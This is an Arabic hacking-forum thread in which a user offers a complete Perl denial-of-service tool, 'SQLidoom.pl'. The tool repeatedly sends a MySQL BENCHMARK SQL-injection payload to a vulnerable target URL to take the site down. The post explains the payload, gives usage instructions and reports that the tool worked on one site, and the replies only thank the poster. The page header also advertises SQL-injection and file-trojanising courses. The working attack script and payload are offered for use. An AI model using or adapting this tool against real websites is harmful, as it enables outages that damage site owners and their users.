1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ أداة ] DOS via SQLi

الموضوع في 'قسم الأدوات' بواسطة Tr0y, بتاريخ ‏1 يناير 2013.

كاتب الموضوع : Tr0y المشاهدات : 1,864 الردود : 4 ‏1 يناير 2013
حالة الموضوع:
مغلق
  1. غير متصل

    Tr0y
    rank
    Developer

    عضو منذ:
    ‏20 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:

    السلام عليكم و رحمة الله و بركاته ..
    ان شاء الله الجميع يكون بالف خير ..
    أطرح بين يديكم اداة دوس أتاك لكن المرة ليس بping بل يجب أن يكون الموقع مصاب بالسكويل أنجكشن
    خلينا نتعمق في الأداة و نشرح كيف تقوم هذه الأداة بالعمل

    كود HTML:
    $code = agent($_[0]." and (select+benchmark(99999999999,0x73656c6563742b62656e63686d61726b2839393939393939393939393939392c504f5728393939393939393939393939393939393939392c39393939293b1f))--");
    print "[".$i."] Try \n";
    $i++;
    unless($code->is_success){
    print "[+] Website Down? - In $i petitions\n";
    }
    للجماعة الي متعمقين في البيرل أظن الامر واضح ما يستحق تفسير ..
    بالنسبة للأشخاص العاديين الفكرة تكمن في تنفيذ الأمر عدة مرات حتى يسقط الموقع و هذا هو الأمر

    كود HTML:
    and (select+benchmark(99999999999,0x73656c6563742b62656e63686d61726b2839393939393939393939393939392c504f5728393939393939393939393939393939393939392c39393939293b1f))--
    الأن مع الأداة كاملة ..

    كود HTML:
    #!/usr/bin/perl -w
    #
    # SQLidoom.pl
    # By ..0x141A1D58FF.. [((3]
    # Just don't do something stupid with this tool, this is just for "education" and fun!
    # I'm not responsable for the wrong use of this software.
    
    use LWP::UserAgent;
    
    my $agent = LWP::UserAgent->new;
    #Use your custom agent
    $agent->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
    $agent->timeout(5);
    if ($ARGV[0]) {
    start($ARGV[0]);
    } else {
    info();
    }
    #Start the attack
    sub start {
    print "\n[+] Target : " . $_[0] . "\n";
    print "\n[+] Starting the attack\n[+] Info: Control+C to stop attack\n\n";
    print "\n[+] Using proxy $proxy\n\n";
    my $i=0;
    while(1){
    $SIG{INT} = \&stop;
    $code = agent($_[0]." and (select+benchmark(99999999999,0x73656c6563742b62656e63686d61726b2839393939393939393939393939392c504f5728393939393939393939393939393939393939392c39393939293b1f))--");
    print "[".$i."] Try \n";
    $i++;
    unless($code->is_success){
    print "[+] Website Down? - In $i petitions\n";
    }
    }
    }
    #Cancel the attack
    sub stop {
    print "\n[+] Stopping attack\n";
    exit 0;
    }
    #Info
    sub info {
    print "\nAttack a  SQLi  vulnerable website with some \"Magic\" and take it down in a few seconds";
    print "\nby ..0x141A1D58FF.. [((3]\n";
    print "\nUsage: perl $0 <target>\n";
    print "[info]\n";
    print "<target> should be like this http://www.target.com/something.php?id=1 \n";
    print "\nExample:";
    print "\nperl $0 'http://www.target.com/something.php?id=1'\n\n";
    exit 0;
    }
    
    sub agent {
    return $agent->get($_[0]);
    }
    الاستغلال :

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    الموقع يلزم يكون مصاب بSQLi

    ملاحظة : قمت بالتعديل في الاداة و ذلك بحذف البروكسي .. أظن أنه لم يعد شغال و جميع الحقوق محفوظة لصاحبها
    تم تجربة الأداة على موقع واحد و اشتغلة تمام :{13}:

     


    جاري تحميل الصفحة...
  2. غير متصل

    Dr.QuSaY
    rank
    Developer

    عضو منذ:
    ‏13 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    JoRdaN

    رد: DOS via SQLi


    جميل بارك الله فيك اخوي

    :{21}:
     


  3. غير متصل

    Shдd0w
    rank
    Developer

    عضو منذ:
    ‏9 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    xXxXx
    الإقامة:

    رد: DOS via SQLi

    الله يعطيك الف عافية أخ فراس,,
    دائماً متألق بطروحاتك المفيدة والمميزة,,,
    تحياتي:{12}:​
     


  4. غير متصل

    Error
    rankrank
    V • I • P

    عضو منذ:
    ‏3 ابريل 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: DOS via SQLi

    الله يجزاكك ألف خير آخوي
     


  5. غير متصل

    رماد انسان
    rank
    Developer

    عضو منذ:
    ‏31 أكتوبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: DOS via SQLi

    بارك الله فيك ​
     


الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...